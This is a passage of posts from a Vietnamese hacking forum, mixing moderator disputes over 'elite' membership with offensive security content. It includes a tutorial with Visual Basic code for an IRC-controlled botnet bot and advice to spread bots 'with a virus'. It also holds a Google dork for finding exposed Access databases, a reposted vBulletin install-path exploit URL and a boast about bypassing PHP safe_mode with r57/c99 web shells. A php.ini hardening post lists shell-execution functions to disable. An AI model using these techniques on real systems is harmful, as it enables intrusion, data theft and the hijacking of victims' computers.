|
|
conmale wrote:
hackernohat wrote:
Ủa đây là một topic nghiêm túc ạ ??? em không chắc là mình làm ra nó với mục đích bàn nghiêm túc mà sử dụng văn phong hơi phóng túng để hỏi chơi một vấn đề đang gây "bức xúc" trong nội bộ diễn đàn,nếu các bác BQT cho rằng đây là một topic rất nghiêm túc thì xin bỏ quá cho em vì lúc lập topic em nghĩ khác .
Nếu topic này lập ra để đùa bỡn thì nên lập ra trong box "Tán gẫu". Thái độ "Hỏi chơi" không thích hợp với box "Góp ý và kiến nghị".
hackernohat wrote:
Theo ý kiến của riêng em,ngay từ trước vụ việc đáng tiếc vừa qua HVA đã sai khi phân hoá quá rõ các thành viên của mình,các bác hẳn đã nghe về việc các công ty quản lí internet của Mỹ ( các ISP ) muốn phân hoá mạng internet ra thành internet nhiều tầng rồi chứ ? sự phân hoá chính là nguồn gốc của mọi xung đột ,chính lịch sử loài người đã chứng minh điều này.
Ngay từ khi mạng internet đc tạo ra,nó đã đc tạo ra với tính chất trung lập,không bị phân tách,nó phục vụ cho mọi giai cấp,mọi tầng lớp của xã hội loài người.Diễn đàn hay còn gọi là forum ngày nay thật ra là một dạng phát triển của các cộng đồng thảo luận cổ xưa của mạng internet là "usernet" nơi mọi người tham gia không cần chứng thực ( đăng kí user ),hoặc dạng thảo luận tức thời hay còn gọi là instant messange "công cộng" mà người ta gọi là IRC (internet relay chat) cũng không có chứng thực,nếu suy xét kĩ chúng ta sẽ thấy rằng các hình thức thảo luận này vẫn còn tồn tại tới ngày nay cho dù chúng đã lỗi thời là vì đâu ? vì chúng là các hệ thống thảo luận có tính chất mở,tức là mọi người đều có thể tham gia không kiểm soát và công bằng về quyền hạn.
Ủa, lạ nhỉ? Tôi nhớ hackernohat có cái chữ ký đại khái thế này: "ráng được màu cam, không thì màu xanh cũng an lòng" mà sao bây giờ quay lại đả phá hệ thống phân cấp nhỉ? Hay vì cảm thấy khó đạt được một chỗ trong hệ thống phân cấp nên phải đổi "chiến thuật"?
Làm một người có tư cách trước tiên phải có lập trường vững vàng và phải có mục tiêu cụ thể. Nếu cảm thấy mục tiêu không vững nên quay ngược lại mà đạp đổ hoặc tấn công nó thì đó là thể hiện của cái gọi là "thiếu tư cách".
HVA không ứng dụng lý thuyết mở vì nó không thích hợp cho chủ trương và đường lối hoạt động của HVA hiện tại. HVA cần phải có chế độ kiểm soát, phân quyền để bảo đảm sự nhịp nhàng và chất lượng của thông tin trao đổi. Cám ơn hackenohat đã đề nghị nhưng rất tiếc đề nghị này không thích hợp với mục tiêu đã đưa ra và đã được BQT thông qua.
hackernohat wrote:
Ta đã nói nhiều về tính mở và không phân hóa của mạng máy tính,vậy điều gì sẽ xảy ra khi mạng máy tính phân hóa.
Lúc đó nó đầu tiên sẽ không còn đc gọi là mạng International Network ( internet) nữa mà gọi là localnetwork (mạng vùng) hay gọi một cách kệch cỡm hơn là GapNetwork (mạng phân hóa) nó sẽ có hại gì ?
Xin thưa cái hại là vô cùng lớn ,khi đó internet sẽ mãi mãi mất đi tính trung lập ,mất đi cái mà người ta gọi là nguồn tri thức của nhân loại.Tri thức không dành cho riêng cho ai hết mà là cho mọi người tất cả mọi ngừơi,nó khiến cho loài người phát triển,khi ta nhìn là quá khứ,khi mà thời đại lúc tri thức chỉ đc truyền cho một số dạng người nhất định thì nhân loại đã như thế nào ? tươi sáng hay tăm tối ?
Câu trả lời là tùy ở người đọc
Xem ở trên.
hackernohat wrote:
Ta đã phân tích bản chất của internet và cái nguy hại khi mạng internet phân hóa.Vậy nguồn gốc của nhưng phân hóa đang dần hình thành này là ở đâu,xin thưa là ở những hành động muốn đưa các tính chất của xã hội thực vào xã hội ảo như là của BQT HVA.Vì ý muốn phân định các dạng người với các quyền truy cập các tài nguyên khác nhau,những người có ý muốn,phân hóa xã hội ảo đã vô tình (hay cố ý) làm mất đi sự tốt đẹp về một thế giới không giai cấp của mạng internet,chính điều này rồi sẽ đưa mạng máy tính tới chỗ diệt vong.
Cám ơn hackernohat quan tâm. Việc tồn hay vong của HVA đã có những thành viên khác quan tâm. Việc tồn vong của mạng máy tính nằm ngoài khả năng kiểm soát của HVA ).
Việc cảm nhận tốt đẹp hay xấu xí từ mô hình đóng hay mở cho HVA là cảm nhận cá nhân, nhất là cảm nhận ấy đi từ những cá nhân cảm thấy không đạt được ý định nên quay lại đạp đổ. Hơn nữa, HVA là một "ngôi nhà riêng", nó có chủ hẳn hòi. Một người đến viếng không nên đòi hỏi một ngôi nhà có chủ phải theo ý người đến viếng.
HVA mở cửa đón nhận mọi người đến viếng và sinh hoạt nhưng việc dùng một học thuyết nào đó để đả phá HVA là điều không nên vì trước tiên mọi người sẽ xét lại tư cách của chính người đả phá.
hackernohat wrote:
Em viết bài viết này không chỉ là ý kiến của mình đưa ra cho mọi người đọc để chơi,mà là để đọc để suy ngẫm.Hãy hành động sao cho đúng với bản chất của mạng internet và ước mong sâu xa nhất của loài người là lập nên một thế giới không sự phân biệt về chủng tộc,màu gia,giàu nghèo.
HVA không phải là thế giới, HVA càng không phân biệt chủng tộc. HVA chỉ đưa ra những mục tiêu để thành viên cố gắng đạt được. Điều cuối cùng khi thành viên đạt được một cái gì đó chính là cái lợi cho chính bản thân người đạt được. Không nên bóp méo vấn đề như thế và nhất là không nên cố bóp méo khi luận cứ chưa đủ vững.
Vài ý kiến.
Xin lỗi bác ,chữ kí của em là em viết lên trong 1 ngày trước là chữ kí để đùa vui với một member khác có chữ kí này
phấn đấu từ trắng -> xanh -> vàng -> cam
Thứ 2 ,bác có lẽ đánh giá em qua 2 topic 1 là "nộp đơn xin việc" và topic này là chưa đủ đâu bác ạ.Em ko phải dạng ăn không đc thì đạp đổ ,em đâu cần một cái title ??? để làm gì ? cái danh hão ư ? em đâu cần nó ,em có thể vào các diễn đàn khác nơi chưa có thành kiến với mình để xin vô BQT dễ dàng ? thế ở HVA em đc cái title elite để làm gì.ngay ở văn phong em dùng cho topic này đã thể hiện rõ ý muốn nói chuyện một cách tế nhị nhưng vui vẻ với anh em rồi
Nếu như bác vẫn giữ thành kiến về cái vụ không hay vừa qua thì em thật thất vọng về bác người có lẽ theo em là người đáng để nghe nhất trong diễn đàn này.Người mà em rất coi trọng và muốn đc đàm đạo.
|
|
|
conmale wrote:
hackernohat wrote:
Cho tớ hỏi ( chính xác là hỏi cho nhiều người ) mấy lão BQT xét elite theo kỉu nào xét bằng lượng bài post hay là chất lượng bài viết ???
Nếu theo chất lượng bài viết thì chắc tui bảo Anh em vô spam để lên level
Còn theo chất lượng bài thì .... thía nào là chất lượng theo định nghĩa của các bác BQT ??
Mong các bác giải thích cho rõ thật rõ về các yêu cầu để các member đc rõ. hết :wink:
Thứ nhất, cái tiêu đề không thể hiện sự quan tâm thật sự đến vấn đề bồ đang thắc mắc. "kỉu" và "thía" không có trong tự điển và không nên dùng cho các chủ đề nghiêm túc.
Thứ nhì, HVA thành lập ra nhóm "elite" không phải gần đây mà đã có từ lâu. Member được tuyển chọn vào nhóm "elite" chớ HVA không tìm member để hình thành nhóm "elite". Cho nên, thắc mắc một cách nghiêm túc thì sẽ được đón nhận và trả lời nghiêm túc. Thắc mắc mang tính hạch hỏi hay bỡn cợt thì sẽ làm cho người đưa ra thắc mắc càng không có cơ hội tham gia.
Thứ ba, xin đọc thông tin này:
http://www.vnhacker.org/hvaonline/posts/list/3278.html#18674
để biết thêm chi tiết.
Thứ tư, nếu quả thật bồ "bảo anh em vô spam để lên level" thì bồ và những người spam sẽ được loại bỏ ra khỏi danh sách member của diễn đàn. Đừng nói chi danh sách "elite".
to BuRaTiNoVnO: em suy nghĩ cho kỹ rồi đưa ra quyết định.
to Vickizw: HVA không phân biệt member cũ và member mới. Nói thế này là không hiểu sự thể. Tôi xin đơn cử Mr.Khoai làm điển hình. Mr.Khoai chỉ sinh hoạt với HVA một thời gian rất ngắn mà đã trở thành "elite member". Lý do: hãy tìm xem tất cả các bài viết và trao đổi của Mr.Khoai trên diễn đàn và tự cho mình một nhận xét. Nếu vẫn chưa tìm ra được lý do tại sao Mr.Khoai trở thành elite member thì bồ chắc chắn chưa thể đạt tiêu chuẩn để tham gia nhóm này.
Viclizw wrote:
Giả sử HVA bị hack một lần nữa (giả sử thôi) và làm lại forum mới , vậy thì nghiễm nhiên những member bây giờ trở thành Elite à
Sai. Những members bây giờ vẫn là member. Những elite members sẽ tiếp tục là elite members. Những elite members bây giờ chính là members ngày trước. Xin đọc thông báo:
http://www.vnhacker.org/hvaonline/posts/list/3278.html#18674
to girlbatcandoi: HVA không " phân biệt chủng tộc màu nick à". Các elite member chứng minh được sự đóng góp và khả năng của họ thì họ được cung cấp môi trường sinh hoạt thích hợp cho khả năng ấy.
Kiến thức là của riêng của từng cá nhân, là thành quả của sự cố gắng và sự bền bỉ. Chia xẻ kiến thức không phải là vấn đề nhưng chia xẻ kiến thức đúng cấp độ kinh nghiệm thì khác. Một member chưa biết cách sử dụng máy cho nhuần nhuyễn thì không thể tham gia thảo luận thâm nhập. Đơn giản chỉ có thể.
to VMware: một lần nữa xảy ra với HVA thì không cần bồ vĩnh biệt mà chính HVA có lẽ sẽ không tiếp tục hoạt động.
Ủa đây là một topic nghiêm túc ạ ??? em không chắc là mình làm ra nó với mục đích bàn nghiêm túc mà sử dụng văn phong hơi phóng túng để hỏi chơi một vấn đề đang gây "bức xúc" trong nội bộ diễn đàn,nếu các bác BQT cho rằng đây là một topic rất nghiêm túc thì xin bỏ quá cho em vì lúc lập topic em nghĩ khác .
Theo ý kiến của riêng em,ngay từ trước vụ việc đáng tiếc vừa qua HVA đã sai khi phân hoá quá rõ các thành viên của mình,các bác hẳn đã nghe về việc các công ty quản lí internet của Mỹ ( các ISP ) muốn phân hoá mạng internet ra thành internet nhiều tầng rồi chứ ? sự phân hoá chính là nguồn gốc của mọi xung đột ,chính lịch sử loài người đã chứng minh điều này.
Ngay từ khi mạng internet đc tạo ra,nó đã đc tạo ra với tính chất trung lập,không bị phân tách,nó phục vụ cho mọi giai cấp,mọi tầng lớp của xã hội loài người.Diễn đàn hay còn gọi là forum ngày nay thật ra là một dạng phát triển của các cộng đồng thảo luận cổ xưa của mạng internet là "usernet" nơi mọi người tham gia không cần chứng thực ( đăng kí user ),hoặc dạng thảo luận tức thời hay còn gọi là instant messange "công cộng" mà người ta gọi là IRC (internet relay chat) cũng không có chứng thực,nếu suy xét kĩ chúng ta sẽ thấy rằng các hình thức thảo luận này vẫn còn tồn tại tới ngày nay cho dù chúng đã lỗi thời là vì đâu ? vì chúng là các hệ thống thảo luận có tính chất mở,tức là mọi người đều có thể tham gia không kiểm soát và công bằng về quyền hạn.
Ta đã nói nhiều về tính mở và không phân hóa của mạng máy tính,vậy điều gì sẽ xảy ra khi mạng máy tính phân hóa.
Lúc đó nó đầu tiên sẽ không còn đc gọi là mạng International Network ( internet) nữa mà gọi là localnetwork (mạng vùng) hay gọi một cách kệch cỡm hơn là GapNetwork (mạng phân hóa) nó sẽ có hại gì ?
Xin thưa cái hại là vô cùng lớn ,khi đó internet sẽ mãi mãi mất đi tính trung lập ,mất đi cái mà người ta gọi là nguồn tri thức của nhân loại.Tri thức không dành cho riêng cho ai hết mà là cho mọi người tất cả mọi ngừơi,nó khiến cho loài người phát triển,khi ta nhìn là quá khứ,khi mà thời đại lúc tri thức chỉ đc truyền cho một số dạng người nhất định thì nhân loại đã như thế nào ? tươi sáng hay tăm tối ?
Câu trả lời là tùy ở người đọc
Ta đã phân tích bản chất của internet và cái nguy hại khi mạng internet phân hóa.Vậy nguồn gốc của nhưng phân hóa đang dần hình thành này là ở đâu,xin thưa là ở những hành động muốn đưa các tính chất của xã hội thực vào xã hội ảo như là của BQT HVA.Vì ý muốn phân định các dạng người với các quyền truy cập các tài nguyên khác nhau,những người có ý muốn,phân hóa xã hội ảo đã vô tình (hay cố ý) làm mất đi sự tốt đẹp về một thế giới không giai cấp của mạng internet,chính điều này rồi sẽ đưa mạng máy tính tới chỗ diệt vong.
Em viết bài viết này không chỉ là ý kiến của mình đưa ra cho mọi người đọc để chơi,mà là để đọc để suy ngẫm.Hãy hành động sao cho đúng với bản chất của mạng internet và ước mong sâu xa nhất của loài người là lập nên một thế giới không sự phân biệt về chủng tộc,màu gia,giàu nghèo.
Vậy rốt cục HVA có phải là một hiệp hội của những người làm bảo mật,những người làm nhiệm vụ bảo vệ mạng máy tính không ? Tại sao lại thực hiện những hành động mà gần như đã giết chết lý tưởng của mạng internet ?
Xin BQT suy nghĩ .Tôi tham, gia mạng máy tính ngay từ những ngày mà internet mới có tại VN tôi không muốn nó mất đi những gì mà tôi tin theo nó.
|
|
|
Cho tớ hỏi ( chính xác là hỏi cho nhiều người ) mấy lão BQT xét elite theo kỉu nào xét bằng lượng bài post hay là chất lượng bài viết ???
Nếu theo chất lượng bài viết thì chắc tui bảo Anh em vô spam để lên level
Còn theo chất lượng bài thì .... thía nào là chất lượng theo định nghĩa của các bác BQT ??
Mong các bác giải thích cho rõ thật rõ về các yêu cầu để các member đc rõ. hết :wink:
|
|
|
Cái này chỉ dùng đề hack các trang dùng database Access của microsoft thôi
cách thực hiện
vô google gõ:
"index of" /*.mdb
là xong
còn chống hả
tìm hỉu về file robot.txt
|
|
|
Mong bạn có nhiều ý kiến xây dựng topic hơn là khoe kinh nghệm ,nếu bạn có nhiều kinh nghiệm tại sao không mang ra cho mọi người học hỏi ?? hay là bạn chỉ tìm cớ để spam bài ??
|
|
|
jamesmr wrote:
hackernohat wrote:
30 Con bot thì chưa có gì phải đáng tiếc ,tốt nhất bạn nên chọn một IRC server khác rồi dùng virus để hộ tống con bot tới thật nhiều ( 30 máy bị thì chưa có thể gọi đây là một botnet mạnh :twisted: )
trình độ kém cõi cỡ tôi làm được vậy cũng là thành công rồi.không biết "cao thủ" làm được gì chưa nhỉ!?
He bộ tớ viết đc bài này mà chưa có tẹo kinh nhiệm nào thì quả là rất "bậy".Mà tớ có làm đc mạng botnet hay không thì cũng không dám kể kẻo vô .....
|
|
|
aotrang wrote:
Chào các bạn, mình có một cái mã nguồn của forum Invision và đã up lên host php nhưng nó sảy ra lỗi và báo là do lỗi cấu hình data base SQL. Vậy bác nào biết cách cấu hình thì giúp mình với nhé.
Chi tiết về cái lỗi này các bác tham khảo tại link của em: http://dtha20.phpnet.us/forum
Các bác reply nhanh giúp nhé. Cảm ơn các bác nhiều )
chắc là sài host free và không có support MySQL
|
|
|
30 Con bot thì chưa có gì phải đáng tiếc ,tốt nhất bạn nên chọn một IRC server khác rồi dùng virus để hộ tống con bot tới thật nhiều ( 30 máy bị thì chưa có thể gọi đây là một botnet mạnh :twisted: )
|
|
|
jamesmr wrote:
light.phoenix wrote:
Mô hình hoạt động của một botnet như sau:
- Các auto-bot (thường là virus, trojan...) sau khi đã lây nhiễm vào một máy tính của người sử dụng nào đó, sẽ kết nối tới một IRC channel định sẵn trong mã lệnh, tại một IRC server nào đó. Các auto-bot này thực chất là một IRC client, sử dụng http://www.irchelp.org/irchelp/rfc/rfc2812.txt để join vào channel (thường là có đặt password).
- Khi người nắm quyền điểu khiển channel cũng join vào channel này, anh ta có thể gửi một thông điệp nào đó cho các client đang join tại đây (là các bot trên các máy tinh zombie). Tuỳ theo giao thức đã quy ước trước mà bot nhận được thông điệp nào sẽ làm công việc tương ứng: Ping, Get System Info, Update, remove, get key logs... Như vậy, thông qua IRC channel, một người có thể điều khiển toàn bộ các máy tính zombie bị cài đặt bot.
Do đặc điểm hoạt động, khi một zombie phát hiện ra bị cài đặt bot, một reverser có thể dò tìm ra mạng botnet nào mà zombie bị điều khiển, khả năng của bot, các lệnh mà bot nhận được.. , bằng các kĩ thuật RE & sniffer packet. Các thông tin này sẽ có ích để xử lý, ngăn chặn botnet.
Theo một nghiên cứu của honeynet cách đây vài năm, đã ghi nhận được một số botnet có khoảng 250000 zombies .
jamesmr wrote:
vậy you giải thích cái này thế nào:
* Identd request from 66.225.200.63
-
Closing Link: [125.234.71.112] Z:Lined (subnet banned due to Floods and Spam)
-
* Disconnected
lúc trước tôi connect bình thường,tư ngày tăng lên 30 bot thì nó thế này.
To jamesmr:
Có thể một số IRC server, để tránh nguy cơ "tiếp tay" cho việc điều khiển botnet, đã giới hạn số client kết nối tới server thông qua IP của cùng một subnet. Điều này là dễ hiểu, vì khi một subnet (trong LAN chẳng hạn, kết nối internet qua NAT) bị nhiễm virus botnet, thì thường số lượng lớn máy tinh của subnet tiến hành kết nối tới một IRC server, tăng số lượng kết nối đạt mức tới hạn cho phép của IRC server, và tình huống bị từ chối kết nối sẽ diễn ra.
Thân mến.
@light.phoenix
thông thường khi kết nối =nat trong lan tới một irc server thì chỉ khoảng được từ 3đến 4 kết nối là irc server ko cho kết nối nữa(tôi hiểu cái này chứ).
Nhưng đây là 30 con bot trên 30 máy bất kì trên internet (có thể là họ sử dụng viettel,fpt,vnn) nhưng vẫn bị thông báo lỗi ở trên bởi vậy tôi mới ngạc nhiên tại sao họ phát hiện được.
chắc tụi nó chặn luôn khi thấy quá nhiều connection từ một subnet nên nó chặn tất ,mà một subnet thì chặn cả một mạng rùi còn gì
|
|
|
jamesmr wrote:
nhocbmt wrote:
Bài viết khái quát
Nói chung nếu muốn dựa vào bài viết này mà phát triển 1 "mạng bot net " thì rất.... mập mờ... !
- Thân ! nhocbmt !
Hoàn toàn chính xác,cái này dành cho những ai chưa biết đọc hiểu là chính.
còn bạn thì sao ???? đã có kinh nghiệm chưa,nếu có cho phép NoHat thỉnh giáo :wink:
|
|
|
Xin nhắc lại một lần nữa,bài viết này NoHat viết chỉ là để truyền đạt kiến thức vầ botnet chứ không phải làm sẵn một con botnet với đầy đủ tính "độc" để những người kém ý thức mang đi phá làng phá xóm
|
|
|
nhocbmt wrote:
Bài viết khái quát
Nếu viết như bác tôi có thể viết hàng chục bài có tính năng " bot net " như bác !
Port 6667 là port mặt định khi install mirc serv ( hình như vậy ) ! Và nếu có port khác thì chỉ là dự phòng khi port mặt định max connnect !
Như nếu bác nói nếu viết = vb thì vb ko tương tác với IRC ! có nghĩa là pc client phải được chạy cái trình viết = vb ấy trước khi vào irc hoặc do boss cố ý làm điều này khi client connect đến! mà nếu trình đó đã được run trên client trước rồi thì tại sao phải dựa vào IRC để làm công cụ nhĩ ? vd như các bug của IE ta có cho nó connect đến nc mà ta đã listen sẳn ... mọi việc ta làm còn dể hơn nhiều ... !
Nói chung nếu muốn dựa vào bài viết này mà phát triển 1 "mạng bot net " thì rất.... mập mờ... !
- Thân ! nhocbmt !
Đây là bài viết ví dụ,vậy cho tớ hỏi nếu như không có bài viết này bạn có thể rõ đc nền tảng của bot hay không mà đòi viết nhiểu chức năng
Thứ 2 với câu
Như nếu bác nói nếu viết = vb thì vb ko tương tác với IRC ! có nghĩa là pc client phải được chạy cái trình viết = vb ấy trước khi vào irc hoặc do boss cố ý làm điều này khi client connect đến! mà nếu trình đó đã được run trên client trước rồi thì tại sao phải dựa vào IRC để làm công cụ nhĩ ? vd như các bug của IE ta có cho nó connect đến nc mà ta đã listen sẳn ... mọi việc ta làm còn dể hơn nhiều ... !
bạn đã hoàn toàn hiểu sai về bot và botnet nếu bạn truy cập bot qua IE vồi bug của IE và telnet bằng NetCat thì bạn chỉ điểu khiển đc 1 bot trên 1 máy mà thôi,còn botnet mục đích là điểu khiển nhiều máy.
Nên suy nghĩ và đọc kĩ những gì mình chưa hiểu nếu không bạn sẽ bỏ qua rất nhiểu thứ quý giá cho bạn
Thân NoHat
|
|
|
jamesmr wrote:
hackernohat wrote:
jamesmr wrote:
vậy nếu admin đó thấy nhiều kết nối lạ vào và denied thì sao nhỉ?ở đây có ai biết irc nào mà cho kết nối thật nhiều máy ko?,thông thường nếu irc server của nước ngoài thấy có khoảng 30 cái kết nối mà cùng một lúc là họ chặn ngay(tôi ko biết họ nhận ra con bot của mình thế nào nữa).và cổng kết nối irc theo tôi cũng không nhất thiết phải là 6667,mà tuỳ thuộc vào irc server.
PS:dám cá là you này cũng từng hoặc đang kiểm soát 1 mạng bot nào đó.bài viết thật tỉ mỉ.
Chả admin nào chặn cả do IRC server là máy chủ chat công cộng admin của nó sẽ chả chặn đâu ( mà chặn cũng không hết )
vậy you giải thích cái này thế nào:
* Identd request from 66.225.200.63
-
Closing Link: [125.234.71.112] Z:Lined (subnet banned due to Floods and Spam)
-
* Disconnected
lúc trước tôi connect bình thường,tư ngày tăng lên 30 bot thì nó thế này. :?)
Bạn đọc chưa kĩ subnet banned due to Floods and Spam hỉu không tức là bạn đã gửi rất nhiều messange toi IRC server qua một nick
|
|
|
jamesmr wrote:
vậy nếu admin đó thấy nhiều kết nối lạ vào và denied thì sao nhỉ?ở đây có ai biết irc nào mà cho kết nối thật nhiều máy ko?,thông thường nếu irc server của nước ngoài thấy có khoảng 30 cái kết nối mà cùng một lúc là họ chặn ngay(tôi ko biết họ nhận ra con bot của mình thế nào nữa).và cổng kết nối irc theo tôi cũng không nhất thiết phải là 6667,mà tuỳ thuộc vào irc server.
PS:dám cá là you này cũng từng hoặc đang kiểm soát 1 mạng bot nào đó.bài viết thật tỉ mỉ.
Chả admin nào chặn cả do IRC server là máy chủ chat công cộng admin của nó sẽ chả chặn đâu ( mà chặn cũng không hết )
|
|
|
Botnet một cái tên nghe rất quen nhưng hầu như còn huyền bí với đa số dân CNTT Việt Nam
Để làm sáng tỏ về botnet và công nghệ tạo một bot hôm nay NoHat xin viết một tutorial về cách tạo một mạng botnet như là kim chỉ nam cho những người muốn hiểu rõ hơn về botnet.
I.Botnet là gì?
Botnet là một mạng gồm từ hàng trăm tới hàng triệu máy tính bị điều khiển hoàn toàn (theo thuật ngữ người ta gọi các máy tính này là Zombie tức các thây ma),chúng bị điều khiển để cùng làm một công việc gì đó theo mục đích của hacker điều khiển chúng vd: tải về cài đặt các chương trình quảng cáo, hay cùng đồng loạt tấn công một trang web nào đó thông qua kĩ thuật DDoS
II.Mạng BotNet đc tạo nên bởi gì ?
Nền tảng của BotNet là một chương trình máy tính đc thiết kế để liên lạc với hacker ,nhận lệnh và thực hiện lệnh của hacker, người ra gọi chương trình này là "Bot" (viết tắt từ robot).
III.Các con bot liên lạc với hacker bằng gì?
Kể từ những phiên bản đầu tiên các bot đã đc thiết kế để nhận lệnh thông qua các IRC server tức các máy chủ Internet Relay Chat một dạng máy chủ chạy dịch vụ chat công cộng (thường các máy chủ này là các máy chủ thuộc họ *nix ) để nhận đc lệnh từ hacker một cách nhanh nhất.
IV.Vậy các con bot đã dùng các server IRC như thế nào ?
Các máy chủ chạy dịch vụ IRC thường lắng nghe trên port 6667 ( một port cao ).Và các chương trình IRC server sử dụng một tập các chỉ thị gọi là lệnh IRC ( IRC commands )
Các bot thực hiện việc tạo một kết nối ( connection ) thông qua giao thức TCP/IP đến port 6667 của máy chủ IRC rồi sau đó dùng tập lệnh IRC để gửi và nhận các tin nhắn tới hacker.
V.Vậy các bot làm thế nào để có thể đc cài vào máy của người sử dụng bình thường ( Normal User ) ?
Các Bot đều có tính năng đầy đủ của một trojan và sự kết hợp nhuần nhuyễn từ virus vì vậy các con bot đều có thể tự lây lan thông qua các lỗ hổng của hệ điều hành và chiếm quyền điều khiển máy của "người dùng bình thường".Ngoài ra một số bot không đc tích hợp tính năng lây lan nên nó cần đc sự hộ tống của một virus ( đây chính là dạng lây lan phổ biến của các bot hiện nay )
VI.Cách tạo một con "Bot":
Với ví dụ này NoHat sẽ dùng ngôn ngữ lập trình Visual Basic để minh họa vì ngôn ngữ này đc nhiều người sử dụng nếu có thời gian NoHat sẽ post thêm bài viết về cách viết bot trên nền ngôn ngữ C++
Con bot này sẽ có tính năng cơ bản là kết nối tới server IRC và trả lời khi hacker hỏi "LiveOrNot"
1.Điều đầu tiên mà bạn phải học là tập lệnh IRC:
Tập lệnh IRC sẽ có sự khác biệt đôi chút khi nó chạy trên các chương trình quản lý IRC server khác nhau
Code:
USER <Real Name> là lệnh thiết lập tên thật cho bot khi nó vào IRC server
NICK <NickName> là lệnh thiết lập nick name cho bot
JOIN <Channel> là lệnh cho bot truy cập vào một "kênh" (channel),channel tương tự như một room chat vậy
PRIVMSG <Channel> : <Message> là lệnh gửi tin nhắn tới hacker
Thứ tự các lệnh từ 1 tới 3 mà NoHat nêu chính là thứ tự các lệnh mà bạn phải gửi tới IRC server
2.Một số Sub chính cho bot:
Khai báo hằng và biến:
Code:
Const Server As String = "irc.datviet.net" 'tên channel
Const Port As Integer = 23 'port
Const Channel As String = "NoHat" 'Kênh mà bot sẽ chui vào
Dim Nick As String 'Nick của bot
Bạn tạo môt Form mới và kéo thả vào đó thành phần WinSock đặt thuộc tính name là ws
Code:
Private Sub Form_Load()
ws.Connect Server, Port 'Tạo một kết nối tới server IRC
Nick = "Tester" & LTrim(RTrim(Str(Int(Rnd * 100))))
End Sub
Sub thực hiện việc gời command sau khi kết nối hoàn thành
Code:
Private Sub ws_Connect()
Dim UserName, RealName As String
UserName = Nick
RealName = Nick
ws.SendData "USER " & UserName & " 0 * " & RealName & vbCrLf
ws.SendData "NICK " & Nick & vbCrLf
ws.SendData "JOIN " & Channel & vbCrLf
ws.SendData "PRIVMSG " & Channel & ":" & " Bot chao master" & vbCrLf
End Sub
Sub đáp trả khi bot nhận đc lệnh
Code:
Private Sub ws_DataArrival(ByVal bytesTotal As Long)
Dim strData As String
Dim Pos As Integer
Dim Master As String
ws.GetData strData
DoEvents
If InStr(strData, "liveornot") <> 0 Then
Pos = InStr(1, strData, "!")
Master = Mid(strData, 2, Pos - 2)
ws.SendData Replace(strData, "liveornot", "Live") & vbCrLf
ws.SendData "PRIVMSG " & Master & " " & Replace(strData, "liveornot", "Live") & vbCrLf
End If
EndSub
VII.Điều khiển bot thế nào ?
Để điều khiển bot bạn hãy cho chạy thử con bot trên để làm ví dụ
Sau đó bật một chương trình IRC Client nào đó ví dụ mIRC
Rồi kết nối vào máy server là irc.datviet.net với port 23 ( đáng nhẽ là port 6667 nhưng không hiểu sao đa phần các IRC server của Việt Nam lại dùng port 23 ?! ) với một nick tùy ý
gõ lệnh:
Code:
/JOIN NoHat (phải có dấu "/" vì mIRC .... bắt phải thế chứ IRC server không bắt thế đâu )
là bạn đã có mặt trong cùng channel với bot của bạn
sau đó hãy gõ lệnh:
Code:
LiveOrNot (chú ý viết hoa y chang nếu không con bot nó ngu ra mặt )
Con bot sẽ trả lời bạn rằng
Code:
-------------------------------------------
Vậy là sau bài viết này NoHat đã đưa ra ánh sáng nền tảng của BotNet cho mọi người cùng tham khảo rồi đọc xong thấy hay thì cổ vũ khen một lời còn không thấy hay thì cũng không seo miễn là đừng có ...... là đc
Chú Ý: Channel thì tùy ý bạn ,khi bạn JOIN vào một channel chưa tồn tại trên IRC server thì channel này sẽ tự đc tạo ngay tức thì.
|
|
|
chupichu wrote:
##############################################
vBulletin 3.5.4 exploit.....install path is open or not secure
###############################################
Discovered By M4k3 PLDsoft Security Team, www.pldsoft.com
Remote : Yes
Critical Level : Dangerous
############################################
Affected software description :
Application : vbulletin
version : latest version [ 3.60 Release 4 ]
URL : http://www.vbulletin.com
########################################
Exploit:
www.vicitimsite.com/forumpath/install/upgrade_301.php?step=http://ww.pldsoft.com
when it works, you can still download the database.....
########################################
Contact:
Nick: M4k3
E-mail: mikathebest2003@yahoo.de
Homepage: http://www.pldsoft.com
########################################
http://www.zack6924-underground.net/forum/admin/adminusers/holz/ha/vbulletinhack_pldsoft.com.rar
Bug Install Path -----> quá cổ
|
|
|
ketusa wrote:
đầu tiên login dô root account
các bạn mở file "php.ini" trong pico editor
[ pico /usr/local/lib/php.ini ]
tìm "safe_mode"
[ Ctrl + W and type "safe_mode" ]
đổi Off thành On
[ "safe_mode = Off" to "safe_mode = On" ]
tìm "disabled_functions"
[ Ctrl + W and type "disabled_functions" ]
và add theo functions
[system, exec, shell_exec, passthru, pcntl_exec, putenv, proc_close, proc_get_status, proc_nice, proc_open, proc_terminate, popen, pclose, set_time_limit, ini_alter, virtual, openlog, escapeshellcmd, escapeshellarg, dl, curl_exec, parse_ini_file, show_source]
sau đó save lại
[ Ctrl + X then Y ]
retart lại Apache web server
[ /etc/init.d/httpd restart ]
done. bây h hết sợ hack local rồi nhá )
chú ý nên backup php.ini trước khi bắt đầu. hehe
Hey còn một hàm cực kì nguy hiểm khác mà đồng chí không nêu ra ,nếu còn để lọt hàm cơ bản này thì việc bật safe_mode của php.ini là vô nghĩa
Hàm: ini_set();
He tui đã dùng hàm này gắn vô r57 và c99 để bypass mấy cái server bật safe_mode đc nhiều năm rồi :twisted:
|
|
|
Cám ơn lời góp ý .Topic này NoHat mở ra với mục đích để mọi người hiểu rõ cách làm sao để đc trở thành HVA Moderator.Còn việc NoHat có đc nhận việc không thì đó còn là tự bản thân mình.
Trao đổi thông tin là mục đích chính
|
|
|
XIn đc mạn phép cho NoHat hỏi chút
Vấn đề là hiện nay không biết BQT có còn tuyển dụng nhân sự nữa không ?
Các điều kiện nộp đơn xin việc
Sẽ bị các lão làng tra khảo như thế nào mới đc nhận thử việc :cry:
Xin các lão BQT trả lời
Trình độ kém cỏi cỡ NoHat có cơ hội xin việc không ạ
|
|
|
He he tớ mở cả DMZ luôn có chết ai đâu tớ còn đang chờ xem có a chui vô máy tớ đc không đây hehehe
|
|
|
Thêm nữa ,em đã thứ tới 3 bản IE rồi , IE 5 IE 6 IE 7 Bêta1 2 3 tất cả đều như nhau
|
|
|
conmale wrote:
hackernohat wrote:
À mà cái nì đúng đó bác conmale à em cũng phải dùng tới FireFox mới bò vô đc còn IE thì nó báo là
::: H V A : F o r u m :::
--------------------------------------------------------------------------------
Cấm truy cập!
Trang hoặc hồ sơ muốn truy cập thuộc khu vực cấm.
Xin vui lòng bấm vào đường dẫn ":::HVA:Forum:::" để trở về trang chủ.
